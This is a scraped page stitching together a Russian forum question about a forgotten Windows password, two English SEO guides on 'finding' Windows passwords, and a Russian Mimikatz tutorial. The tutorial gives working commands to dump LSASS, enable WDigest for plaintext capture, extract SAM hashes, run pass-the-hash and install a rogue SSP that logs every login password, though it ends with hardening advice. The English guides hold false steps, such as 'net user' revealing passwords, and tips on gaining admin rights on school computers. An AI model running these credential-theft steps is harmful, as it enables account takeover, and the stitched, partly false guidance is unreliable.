Просмотр пароля пользователя windows 10

Да, ребята, совсем уж бредовая, и глупая история со мной приключилась совсем недавно. В общем, очень много лет, для многих сайтов, соц. сетей, а также для некоторых зашифрованных дисков использовал я один, незамысловатый пароль. Использовал я его и дома, для основного/автономного пользователя Windows (не Microsoft account). Недавно, придя на работу, открыв Telegram, и уставившись в окно ввода код-пароля, я осознал, что не могу вспомнить свой основной пароль, от слова совсем. В тот же момент у меня началась паника «Как так? Провал в памяти? Что теперь делать?». Я всегда помнил довольно немалое количество паролей, но облажался, забыв именно тот, который решил не записывать, слишком понадеявшись на свою память. Что ж, будет мне уроком, и да, я знаю, что для восстановления различных онлайн аккаунтов можно использовать номер телефона, и почтовый ящик, а для BitLocker нужен ключ восстановления – со всем этим проблем нет, и я уверен, что доступ к 99% ресурсам я смогу восстановить. К сожалению, так не получится с основным пользователем windows 10, ибо, как я выразился ранее, профиль у меня автономный, не подвязанный к Microsoft account.

В данном случае есть два решения – сброс пароля, или же восстановление с помощью сторонних средств, и лично меня интересует больше второй вариант т.е. я хотел бы именно «УЗНАТЬ» свой старый пароль, не сбрасывая его. Для этого ребята в сети советуют использовать такие средства, как Ophcrack, L0phtCrack, и Elcomsoft System Recovery, но вот что действительно стоит использовать в данном случае, я не знаю. В общем, кто сталкивался с подобной задачей, прошу помощи, буду премного благодарен.

P.S. на компьютере еще имеется второй пользователь – моей сестры, доступ к нему имеется, но он не админский, возможно ли как ни будь через него выполнить поставленную задачу?

Have you ever forgotten a password and wished you could just view it instead of going through the tedious process of resetting it? Well, if you’re a Windows 10 user, you’re in luck! In this blog post, we will explore various methods to view user passwords on Windows 10. Whether you need to recover your own forgotten password or you’re assisting a friend who has lost access to their account, these methods will come in handy. We will discuss the steps for each method in detail, along with their pros and cons. So, let’s dive in and learn how to view user passwords on Windows 10!

Video Tutorial:

The Challenge of Viewing User Passwords on Windows 10

Windows 10 is designed with security in mind, and this includes protecting user passwords. As a result, viewing user passwords directly from Windows settings is not a straightforward task. Microsoft has implemented measures to prevent unauthorized access to user passwords as part of their commitment to user privacy and security. However, there are still methods available that can help you view user passwords on Windows 10. In the following sections, we will explore these methods.

Things You Should Prepare for

Before we dive into the methods, there are a few things you should prepare for to ensure a smooth process. Here’s a list of things you’ll need:

1. Access to an administrator account: To view user passwords on Windows 10, you’ll need administrative privileges on the computer.
2. Physical access to the computer: You’ll need physical access to the computer on which you want to view the user password. Remote methods are not covered in this blog post.
3. Basic technical knowledge: While the methods outlined in this blog post are relatively straightforward, having some basic technical knowledge will be helpful.

Now that you’re prepared, let’s explore the methods to view user passwords on Windows 10!

Method 1: How to View User Passwords via Windows Settings

To view user passwords via Windows settings, follow these steps:

1. Press the Windows key + I on your keyboard to open the Windows Settings.
2. Click on “Accounts” to open the Accounts settings page.
3. In the left sidebar, click on “Sign-in options.”
4. Scroll down to the “Password” section and click on “Manage your sign-in info.”
5. You’ll be prompted to enter your password or use a fingerprint/Windows Hello to access your account info. Enter the required credentials to proceed.
6. Under the “Passwords” section, you’ll see a list of saved credentials. Locate the desired account and click on it.
7. Click on the “Show” button next to the password field to view the password.

Pros:

Pros 1. Easy to access via Windows Settings. 2. Does not require third-party software. 3. User-friendly interface.
Cons: 1. Can only view passwords for accounts linked to the Microsoft account. 2. Requires administrative privileges. 3. Passwords are displayed in plain text, potentially compromising security if someone gains unauthorized access to your account.

Method 2: How to View User Passwords Using Command Prompt

To view user passwords using Command Prompt, follow these steps:

1. Open Command Prompt by pressing the Windows key + X and selecting “Command Prompt” from the menu.
2. Type the following command and press Enter: net user
3. You’ll see a list of user accounts on the computer. Identify the account for which you want to view the password.
4. Type the following command and press Enter, replacing “username” with the actual username: net user username
5. The command prompt will display various details about the user account, including the password (encrypted).

Pros:

Pros 1. Built-in feature in Windows, so no need for third-party software. 2. Can be used to view passwords for both local and domain accounts. 3. Does not require an internet connection.
Cons: 1. Passwords are displayed in encrypted form. 2. Requires administrative privileges. 3. Not suitable for users without technical knowledge.

Method 3: How to View User Passwords Using a Password Reset Disk

To view user passwords using a password reset disk, follow these steps:

1. Insert the password reset disk into the computer for which you want to view the password.
2. On the login screen, click on “Reset password.”
3. Follow the on-screen instructions to create a new password for the account.
4. Once the password reset is successful, you’ll be able to log in with the new password.

Pros:

Pros 1. Can be used to view passwords for both local and domain accounts. 2. Provides a secure way to reset passwords. 3. Doesn’t require administrative access to the computer.
Cons: 1. Requires a previously created password reset disk. 2. Only works if a password reset disk was created before forgetting the password. 3. Not suitable for immediate password recovery.

Method 4: How to View User Passwords Using Third-Party Software

To view user passwords using third-party software, follow these steps:

1. Research and identify a reputable password recovery software that supports Windows 10.
2. Download and install the selected software on a separate computer.
3. Launch the software and follow the on-screen instructions to create a password recovery disk or USB drive.
4. Insert the password recovery disk or USB drive into the computer for which you want to view the password.
5. Restart the computer and boot from the password recovery disk or USB drive.
6. Follow the software’s instructions to view the user passwords on the computer.

Pros:

Pros 1. Can be used to view passwords for both local and domain accounts. 2. Can recover passwords even when other methods fail. 3. Some software offers additional features like password removal or account unlocking.
Cons: 1. Requires downloading and installing third-party software. 2. May come at a cost if purchasing a premium version of the software. 3. Potential risk of malware or data breach if using untrustworthy software.

Why Can’t I View User Passwords?

There are several reasons why you may encounter difficulties viewing user passwords on Windows 10. Here are a few common reasons and their fixes:

1. Reason: User account type. If you’re using a standard user account, you won’t have the necessary privileges to view passwords.
Fix: Login with an administrator account or ask the administrator to provide the password.

2. Reason: Microsoft account authentication. If you’re using a Microsoft account to sign in, the password is managed by Microsoft and cannot be viewed directly within Windows settings.
Fix: Reset the password through the Microsoft account recovery process or use one of the other methods mentioned in this blog post.

3. Reason: Encrypted passwords. Windows encrypts user passwords for security purposes, making it difficult to view them directly.
Fix: Use a password recovery software or reset the password through other methods mentioned in this blog post.

Additional Tips

Here are some additional tips to keep in mind when trying to view user passwords on Windows 10:

1. Regularly back up important passwords using a secure password manager.
2. Use strong, unique passwords for each account to minimize the impact of a compromised password.
3. Keep your computer and accounts secure by enabling two-factor authentication whenever possible.

5 FAQs about Viewing User Passwords on Windows 10

Q1: Can I view passwords for accounts that are not linked to a Microsoft account?

A: No, the methods mentioned in this blog post primarily apply to accounts linked to Microsoft accounts. For local user accounts or domain accounts, different methods may be required.

Q2: Are there any risks associated with using third-party password recovery software?

A: Yes, there is a potential risk of downloading and using untrustworthy or malicious software. It’s important to research and use reputable software from trusted sources.

Q3: Is it legal to view someone else’s password without their consent?

A: It is generally illegal to view someone else’s password without their consent, as it violates privacy and security laws. Always ensure you have the necessary permissions before attempting to view or recover passwords.

Q4: Can I use the methods mentioned in this blog post to view passwords on Windows 7 or older versions?

A: The methods mentioned in this blog post are primarily focused on Windows 10. For older versions of Windows, different methods may be required.

Q5: Is it recommended to view user passwords?

A: The act of viewing user passwords should only be done for legitimate reasons, such as password recovery or technical support. It is generally recommended to use secure password management practices and respect user privacy.

In Conclusion

While viewing user passwords on Windows 10 may seem challenging at first, there are methods available to assist in password recovery. Whether it’s through Windows Settings, Command Prompt, a password reset disk, or third-party software, each method has its pros and cons. It’s essential to understand the risks and legal implications associated with viewing user passwords and to always obtain the necessary permissions. Remember to prioritize user privacy and security, and employ strong password management practices to avoid the need for password recovery in the first place.{“@context”:”https://schema.org”,”@type”:”FAQPage”,”mainEntity”:[{“@type”:”Question”,”name”:” Can I view passwords for accounts that are not linked to a Microsoft account?”,”acceptedAnswer”:{“@type”:”Answer”,”text”:” No, the methods mentioned in this blog post primarily apply to accounts linked to Microsoft accounts. For local user accounts or domain accounts, different methods may be required.”}},{“@type”:”Question”,”name”:” Are there any risks associated with using third-party password recovery software?”,”acceptedAnswer”:{“@type”:”Answer”,”text”:” Yes, there is a potential risk of downloading and using untrustworthy or malicious software. It’s important to research and use reputable software from trusted sources.”}},{“@type”:”Question”,”name”:” Is it legal to view someone else’s password without their consent?”,”acceptedAnswer”:{“@type”:”Answer”,”text”:” It is generally illegal to view someone else’s password without their consent, as it violates privacy and security laws. Always ensure you have the necessary permissions before attempting to view or recover passwords.”}},{“@type”:”Question”,”name”:” Can I use the methods mentioned in this blog post to view passwords on Windows 7 or older versions?”,”acceptedAnswer”:{“@type”:”Answer”,”text”:” The methods mentioned in this blog post are primarily focused on Windows 10. For older versions of Windows, different methods may be required.”}},{“@type”:”Question”,”name”:” Is it recommended to view user passwords?”,”acceptedAnswer”:{“@type”:”Answer”,”text”:” The act of viewing user passwords should only be done for legitimate reasons, such as password recovery or technical support. It is generally recommended to use secure password management practices and respect user privacy.”}}]}

В этой статье, написанной в рамках серии статьей, посвященной обеспечению безопасности Windows-систем, мы познакомимся с достаточно простой методикой получения паролей пользователей Windows с помощью Open Source утилиты Mimikatz.

Программа mimikatz позволяет извлечь из памяти Windows пароли в виде простого текста, хэши паролей, билеты kerberos из памяти и т.д. Также mimikatz позволяет выполнить атаки pass-the-hash, pass-the-ticket или генерировать Golden тикеты. Функционал mimikatz доступен также через Metasploit Framework.

Скачать утилиту mimikatz можно c GitHub: https://github.com/gentilkiwi/mimikatz/releases/. Распакуйте архив mimikatz_trunk.zip в каталог C:\Tools\mimikatz. В этом каталоге появятся две версии mimikatz – для x64 и x86. Используйте версию для своей битности Windows.

В этой статье мы покажем, как получить пароли пользователей в Windows Server 2016 или Windows с помощью mimikatz.

Дисклаймер. Информация и технологии, описанные в данной статье, стоит использовать только в информационно-ознакомительных целях, и ни в коем случае не применять для получения доступа к учетным записям, информации и системам третьих лиц.

Содержание:

  • Извлекаем хэши паролей пользователей из памяти Windows
  • Получение хешей паролей пользователей из дампа памяти Windows
  • Получение паролей пользователей из файлов виртуальных машины и файлов гибернации
  • Как узнать пароли пользователей Windows в открытом виде через протокол WDigest?
  • Извлекаем пароли локальных пользователей Windows из SAM
  • Использование Mimikatz в pass-the-hash атаках
  • Просмотр сохраненных паролей в Windows
  • Дампим пароли при входе в Windows
  • Как защитить Windows от извлечения паролей из памяти?

Извлекаем хэши паролей пользователей из памяти Windows

Попробуем извлечь хэши паролей всех залогиненых пользователей из памяти Windows (процесса lsass.exe — Local Security Authority Subsystem Service) на RDS сервере с Windows Server 2016.

  1. Запустите Mimikatz.exe с правами администратора;
  2. В контексте утилиты выполните команды:
    mimikatz # privilege::debug

    Данная команда предоставит текущей учетной записи права отладки процессов (SeDebugPrivilege).
  3. mimikatz # sekurlsa::logonPasswords full

    Данная команда вернет довольно большой список. Найдите в нем учетные записи пользователей.
  4. В моем случае на сервере кроме моей учетной записи есть активные сессии двух пользователей: anovach и administrator.
  5. Скопируйте их NTLM хэши (выделено на скриншоте). В моем случае получились такие данные:
    anovach (NTLM: 79acff649b7a3076b1cb6a50b8758ca8)
    Administrator (NTLM: e19ccf75ee54e06b06a5907af13cef42)

получение NTLM хэша пароля пользователя Windows из LSASS

Можно использовать mimikatz не в интерактивном, а в командном режиме. Чтобы автоматически получить хэши паролей пользователей и экспортировать в текстовый файл, выполните команды:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> c:\tools\mimikatz\output.txt

Теперь можно воспользоваться любым офлайн (есть утилита hashcat в Kali Linux) или онлайн сервисом по расшифровке NTLM хэшей. Я воспользуюсь сервисом https://crackstation.net/

Как вы видите, сервис быстро нашел значения для этих NTLM хэшей. Т.е. мы получили пароли пользователей в открытом виде (представьте, что один из них это администратор домена….).

расшифровка ntlm хэшей

Как вы видите, благодаря mimikatz мы получили NTLM хеши всех активных пользователей! Все это благодаря тому, что на данном компьютере разрешено использовать режим отладки, выставляя флаг SeDebugPrivilege для нужного процесса. В этом режиме программы могут получать низкоуровневый доступ к памяти процессов, запущенных от имени системы.

Примечание. В июне 2017 года многие крупные компании России, Украины и других стран были заражены вирусом-шифровальщиком not-petya, которые для сбора паролей пользователей и администраторов домена использовал в том числе интегрированный модуль mimikatz.

Получение хешей паролей пользователей из дампа памяти Windows

Рассмотренная выше методика получения хэшей пароля не сработает, если на сервере установлен антивирус, блокирующего инъекцию. В этом случае придется сначала создать дамп памяти процесса LSASS на целевом сервере, и затем на другом компьютере с помощью mimikatz извлечь из него хэши пароли для сессий пользователей.

Создать дамп памяти процесса в Windows довольно просто. Запустите Task Manager, найдите процесс lsass.exe, щелкните по нему правой клавишей и выберите Create dump file.

дамп процесса lsass.exe

Windows сохраните дам памяти в указанную папку.

Вам осталось только разобрать дамп с помощью mimikatz (можно на другом компьютере). Загрузите дамп памяти в mimikatz:

Mimikatz “sekurlsa::minidump C:\Users\anovach\AppData\Local\Temp\lsass.DMP”

Вывести информацию о пользователях, и хэшах их паролей из сохраненного дампа памяти:

# sekurlsa::logonPasswords

получение ntlm хэшей из дампа памяти

Вы можете получить дамп памяти с удаленного компьютера с помощью psexec, или через WinRM (при наличии прав администратора), и затем из него пароли пользователей.

Также для получения дампа можно использовать утилиту procdump от Sysinterals.

procdump -ma lsass.exe lsass.dmp

Дамп памяти для процесса LSASS можно получить с помощью PowerShell функции Out-Minidump.ps1 . Импортируйте функцию Out-Minidump в PoSh и создайте дамп памяти процесса LSASS:

Import-Module .\OutMiniDump.ps1
Get-Process lsass | Out-Minidump

Получение паролей пользователей из файлов виртуальных машины и файлов гибернации

Также возможно извлечь пароли пользователей из файлов дампов памяти, файлов гибернации системы (hiberfil.sys) и. vmem файлов виртуальных машин (файлы подкачки виртуальных машин и их снапшоты).

Для этого понадобится пакет Debugging Tool for Windows (WinDbg), сам mimikatz и утилита преобразования .vmem в файл дампа памяти (для Hyper-V это может быть vm2dmp.exe или MoonSols Windows Memory toolkit для vmem файлов VMWare).

Например, чтобы преобразовать файл подкачки vmem виртуальной машины VMWare в дамп, выполните команду:

bin2dmp.exe "winsrv2008r2.vmem" vmware.dmp

Полученный дамп откройте в WinDbg (File -> Open Crash Dump). Загрузите библиотеку mimikatz с именем mimilib.dll (используйте версию библиотеки в зависимости от разрядности Windows):

.load mimilib.dll

Найдите в дампе процесс lsass.exe:

!process 0 0 lsass.exe

Поиск в дампе памяти процесса lsass

И наконец, выполните:

.process /r /p fffffa800e0b3b30
!mimikatz

В результате вы получите список пользователей Windows, и NTLM хэши их паролей, или даже пароли в открытом виде.

Получаем пароль пользователя Windows

Как узнать пароли пользователей Windows в открытом виде через протокол WDigest?

В старых версиях Windows по умолчанию разрешалась дайджест-аутентификации (HTTP Digest Authentication) с помощью протокола WDigest. Основной недостаток этого протокола – для корректной работы он использует пароль пользователя в открытом виде, а не виде его хэша. Mimikatz позволяет извлечь эти пароли из памяти процесса LSASS.EXE.

Протокол WDigest по-умолчанию отключен во всех новых версиях Windows, в том числе Windows 10 и Windows Server 2016. Но не удален окончательно. Если у вас есть права администратора в Windows, вы можете включить протокол WDiget, дождаться входа пользователей и получить их пароли.

Включите поддержку Wdigest:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

UseLogonCredential отключаем в реестре

Обновите GPO:

gpupdate /force

включить wdigest в windows через UseLogonCredential

Дождитесь входа пользователей (в Windows 10 нужно пользователю нужно перезайти, в Windows Server 2016 достаточно разблокировать сессию после блокировки экрана) и получите их пароли через mimikatz:

privilege::debug
sekurlsa::wdigest

Как вы видите, в секции wdigest содержится пароль пользователя в открытом виде:

получение пароля пользователя в открытом виде

Извлекаем пароли локальных пользователей Windows из SAM

С помощью mimikatz вы можете извлечь хэши паролей локальных пользователей Windows из SAM так:

privilege::debug
token::elevate
lsadump::sam

Также можно извлечь NTLM хэши SAM из реестра.

  1. Экспортируйте содержимое веток реестра SYSTEM и SAM в файлы:
    reg save hklm\sam c:\tmp\sam.hiv
    reg save hklm\security c:\tmp\sec.hiv

    экспорт реестра

  2. Затем с помощью Mimikatz извлеките хэши паролей:
    privilege::debug
    token::elevate
    lsadump::sam c:\tmp\sam.hiv c:\tmp\sec.hiv

извлечение ntlm хэшей из реестра

Использование Mimikatz в pass-the-hash атаках

Если у пользователя используется достаточно сложный пароль, и получить его быстро не удается, можно использовать Mimikatz для атаки pass-the-hash (повторное использование хэша). В этом случае хэш может использовать для запуска процессов от имени пользователя. Например, получив NTLM хэш пароля пользователя, следующая команда запустит командную строку от имени привилегированного аккаунта:

privilege::debug
sekurlsa::pth /user:Administrator /domain:srv01 /ntlm:e19ccf75ee54e06b06a5907af13cef42 /run:powershell.exe

использование mimikatz для запуска команд по известному хэшу

Также для использования NTLM хэша для выполнения команд на удаленных компьютерах можно использовать утилиту Invoke-TheHash. Позволяет также

Просмотр сохраненных паролей в Windows

В Windows вы можете сохранять пароли в Windows Credential Manager (это могут быть пароли для доступа к удаленным компьютерам, сайтам, пароли для RDP подключений в формате TERMSRV/server1). Mimikatz может извлечь эти пароли из Credential Manager и показать их вам:

privilege::debug
sekurlsa::credman

Как вы видите, сохраненый пароль показан в секции credman.

получаем сохраненные пароли Windows

Дампим пароли при входе в Windows

Еще один интересный способ дампа паролей в Windows заключается в использовании дополнительно SSP провайдера (Security Support Provider).

  1. Скопируйте файл библиотеки Mimikatz mimilib.dll в папку C:\Windows\System32\.
  2. Зарегистрируйте дополнительного провайдер командой:
    reg add "hklm\system\currentcontrolset\control\lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

    поддельный ssp провайдер mimilib.dll

  3. При входе каждого пользователя в Windows его пароль будет записываться в файл kiwissp.log. Можно вывести все пароли через PowerShell:
    Get-Content C:\Windows\System32\kiwissp.log

пароли всех пользователей зписываются при входе в Windows в тектовый файл

Как защитить Windows от извлечения паролей из памяти?

В Windows 8.1 и Server 2012 R2 (и выше) возможности по извлечению паролей через LSASS несколько ограничены. Так, по-умолчанию в этих системах в памяти не хранятся LM хэш и пароли в открытом виде. Этот же функционал бэкпортирован и на более ранние версии Windows (7/8/2008R2/2012), в которых нужно установить специальное обновление KB2871997 (обновление дает и другие возможности усилить безопасность системы) и отключить WDigest в реестре (в ветке HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest установить параметр DWORD реестра UseLogonCredential равным 0).

Если после установки обновления и ключа UseLogonCredential попробовать извлечь пароли из памяти, вы увидите, что mimikatz с помощью команды creds_wdigest не сможет извлечь пароли и хэши.

mimikatz creds_wdigest не работает в Windows 8.1 / 2012 R2 и выше

Выше мы показывали, как при наличии прав администратора можно легко установить этот ключ в уязвимое значение. После этого вы опять сможете получить доступ к паролям в памяти LSA.

В инструментарии mimikatz есть и другие инструменты получения паролей и их хэшей из памяти (WDigest, LM-hash, NTLM-hash, модуль для захвата билетов Kerberos), поэтому в качестве рекомендаций рекомендуется реализовать следующие меры:

  • Запретить хранить пароли с использование обратимого шифрования (Reversible Encryption);
  • Отключите Wdiget;
  • Отключить NTLM
  • Запретить использование сохранённых паролей в Credential Manager
  • Запретить кэшировать учетные данные доменных пользователей (ключ CachedLogonsCount и политика Interactive logon: Number of previous logons to cache)
  • Если функциональный уровень домена не ниже Windows Server 2012 R2, можно добавить учетные записи администраторов в специальную группу Protected Users ote. В этом случае NTLM хэши для таких пользователей создаваться не будут.
  • Включите защиту LSA процесса (данный параметр разрешит доступ к LSASS памяти только процессам, подписанным Microsoft):
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 00000001 /f
    . Можно распространить этот параметр реестра на компьютеры через GPO.
  • Используйте Credential Guard для защиты содержимого LSA процесса;
  • Запретите получение debug полномочий даже для администраторов (GPO: Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment -> Debug programs). Впрочем, это легко обходится при наличии прав SYSTEM или так.

Выводы. Еще раз напоминаем прописные истины:

  • Не стоит использовать одинаковые пароли для разных сервисов (особенно RDP/RDS хостов, находящихся во владении третьих лиц);
  • Задумайтесь о безопасности ваших паролей и данных, находящихся на виртуальных машинах в облаках, ведь вы не можете быть уверенными в том, у кого еще имеется доступ к гипервизорам и хранилищу, на котором расположены файлы виртуальных машины;
  • Минимизируйте в своих системах количество учетных записей, обладающих правами локального администратора (см. гайд об организации защиты учетных записей администраторов в среде Windows);
  • Никогда не заходите с учетной записью администратора домена на сервера и компьютеры, доступные другим пользователям.

Administrator account helps you to operate windows fully. If you have a hold of an administrator account, you can easily handle all the basic operations on your windows, such as downloading applications and changing settings on your system. If you are someone who cannot find administrator password, keep reading this guide to solve your how do I find my administrator username and password to the account query.

How to Find Administrator Password On Windows 10

Table of Contents

Keep reading this article further to know how you can find and change the password administrator account. But firstly, let us learn more about administrator accounts and passwords of your Windows 10 device.

Is There a Default Administrator Password for Windows 10?

No, there is no default administrator password for Windows 10 but only one administrator password which is the original one. If you have forgotten your administrator password, then there are ways to find administrator password for your account.

What Do I Do if I Forgot My Administrator Password?

In case you forget your administrator password, you will have to reset the Windows administrator password from your desktop settings. But for that, you need to have a Microsoft account logged in on your desktop to attempt this.

How Do I Find My Administrator Username and Password for Windows 10?

If you cannot find administrator password for your administrator account for Windows 10 with the username, then follow the steps below to recover it back:

1. Open the Microsoft Sign in page for your administrator account.

2. Click on the Sign-in options.

Click on sign-in options | How to Find Administrator Password On Windows 10

3. Click Forgot my username option.

Click on forgot my username option

4. Recover your username using your Email or phone number.

Recover your username by logging in with email

5. Once you have received your username, you can change your password by clicking on Forgot password.

Also Read: How to Enable or Disable Administrator Account in Windows 10

How Do I Find My Administrator Password on Windows 10?

The administrator password on Windows 10 is not visible to the users, to get it you have to reset Windows administrator password. To do so on Windows 10, you need to simply open your desktop settings and follow the steps below to find administrator password.

1. Open the Settings application on your desktop.

2. Click on the Accounts option in it.

Select the accounts option

3. Click the Sign-in options > Password options.

4. Click the Change option to find the administrator password.

Change the password by signing-in | How to Find Administrator Password On Windows 10

Also Read: How to Turn Off Restricted Mode on YouTube Network Administrator

How To Find Administrator Password Windows 10 Using Command Prompt?

Command prompt lets you find administrator password for your account. Follow the upcoming steps to do the same.

Note: To perform this method, you need to have an administrator account on your desktop.

1. Type Command Prompt in the Windows search bar and click Open.

2. Type net user in it.

3. Next, type net user USERNAME to change the administrator password.

Use net user USERNAME to find password in command prompt

4. If you have logged in as an administrator, you will be provided with a new password option for you to set.

How to Set or Reset Windows 10 Administrator Password?

If you couldn’t find administrator password, follow the steps below to set or reset Windows administrator password for Windows 10:

Note: You need to have a Microsoft account logged in on your desktop for this step.

1. Open Settings and click the Accounts option, as shown below.

Select the accounts option

2. Click on the Microsoft Account option and go to Edit Profile.

3. Click on Change Password and save the changes made.

Also Read: How to Remove or Reset the BIOS Password (2022)

What Happens If I Delete Administrator Account Windows 10?

In case you couldn’t find administrator password and opt for deleting the administrator account in your Windows 10, it will lead to deleting all the data stored in your system. From pictures, and files to apps, every important data that you have stored will be wiped off.

How Do I Turn Off School Restrictions in Windows 10?

To turn off school restrictions in Windows 10, follow the below steps:

1. Open the Settings application on your desktop.

2. Click on the Accounts option in it.

3. Click the Access work or school account.

4. Click on the Disconnect option to disconnect the School account from your system.

Disconnect the school account access work or school option

Also Read: How to Disable Wakeup Password in Windows 11

How Do I Get Administrative Privileges on My School Computer?

To get administrative privileges on your school computer, you need to find administrator Password and the Username of the system. Once you know them, you can access and manage to enjoy the administrative privileges on your school computer.

How Do I Reset My School Laptop Password?

1. Log in to your school laptop by filling in the username and password.

2. Open the Settings option.

3. Go to Update & Security in it.

4. Click on the Recovery option.

5. Click on Get Started to reset the laptop.

Click on recovery option and select get started to reset the laptop | How to Find Administrator Password On Windows 10

Can You Wipe a School Laptop?

Yes, you can wipe a school laptop by clean installing the system. You can achieve this by going to windows security and fresh starting the system. This will help the laptop work faster and will optimize its health.

Recommended:

  • 14 Best Fastest Browsers for Android
  • Fix Update Error 0x80070bcb Windows 10
  • Fix Chrome Not Saving Passwords in Windows 10
  • Enable Or Disable Administrator Account On Login Screen In Windows 10

We hope you have understood the steps to learn how to find administrator password on your Windows 10 PC and were able to perform it successfully. You can drop your queries about this article and topic suggestions for future articles in the comments section below.

Понравилась статья? Поделить с друзьями:
0 0 голоса
Рейтинг статьи
Подписаться
Уведомить о
guest

0 комментариев
Старые
Новые Популярные
Межтекстовые Отзывы
Посмотреть все комментарии
  • Windows server 2019 1809 обновить
  • Как открыть корзину в windows 10 команда
  • Почему биос не видит загрузочную флешку с windows 10 на ноутбуке
  • Java setup windows 7
  • Make questions 1 jane is cleaning the windows